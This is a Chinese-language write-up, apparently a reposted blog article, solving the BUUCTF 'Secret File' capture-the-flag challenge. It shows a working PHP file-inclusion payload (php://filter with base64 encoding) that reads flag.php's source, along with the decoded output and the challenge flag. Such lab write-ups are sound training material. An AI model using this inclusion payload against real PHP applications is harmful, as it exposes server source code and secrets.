本文主要是介绍BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件
启动我们的项目,看到挑战的页面
右键查看网页的源代码
看到一个可疑的链接,我们访问它:./Archive_room.php。然后出现以下新的页面,我们根据提示访问它看看会出现什么…
啊啊啊???什么?就没别的提示了吗?
不急,我们看看源代码。好吧源代码什么也没有。但是根据上一个页面的提示:**没看清楚?回去再仔细看看吧。**这句话很可疑,是不是提示我们说那里有个重定向,导致页面跳转的太快所以我看不到!所以我们这里用BurpSuite抓包看看!
Bingo!我们抓到重要的提示了。我们访问./secr3t.php 这个页面看看
这里提示我们flag在./flag.php这个页面。我们继续访问它看看!!!
我们成功访问到这个页面了,但是这里根本就没有flag.php。提示也没有…但是我又想到之前做CTF题的经验,觉得它有可能把flag藏在了浏览器那里!
所以我们返回到浏览器访问./flag.php这个页面,然后再按F12看看有没有什么信息!(在查看器那里看代码)
还是不行,不管是看前端的代码,更改字体颜色或者是背景颜色都没有看到flag。继续查看里面的请求头,Cookie信息都没有发现可疑文件~~~
好吧,实在是找不到办法了。上网看看其它大佬看看他们是怎么做的。然后得到提示说是在secr3t.php这个页面有个文件包含。emmmmmmmmmm…
所以我们回去用浏览器访问secr3t.php这个页面,然后再用文件包含看看能不能得到flag。
呃呃呃,这是!重要的PHP代码,刚刚用BurpSuite抓包的时候没有看到这个。这里确实是提示了文件包含。。。。好吧,原来用访问页面BurpSuite还有这个问题。学到了。。。
接下来,我们用火狐浏览器的Hackbar,然后再用我经常用到的文件包含代码看看能不能把隐藏的flag.php展示出来:?file=php://filter/read=convert.base64-encode/resource=flag.php
把上面的base64的数据复制下来,然后放到BurpSuite下的Decoder下进行解密操作:
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7M2FlNWMzYzItMmZlOS00ZjU3LTg5MzgtYWQwOTcyNjUxNzNmfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo= 解密后得到:
<head><meta charset="utf-8"><title>FLAG</title>
</head><body style="background-color:black;"><br><br><br><br><br><br><h1 style="font-family:verdana;color:red;text-align:center;">啊哈ï¼ä½ 找到我了ï¼å¯æ˜¯ä½ 看ä¸åˆ°æˆ‘QAQ~~~</h1><br><br><br><p style="font-family:arial;color:red;font-size:20px;text-align:center;"><?phpecho "我就在这里";$flag = 'flag{3ae5c3c2-2fe9-4f57-8938-ad097265173f}';$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'?></p>
</body>
Bingo,可以看到我们的flag啦!我们把它复制下来然后提交可以了!
Flag:flag{3ae5c3c2-2fe9-4f57-8938-ad097265173f}
这篇关于BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!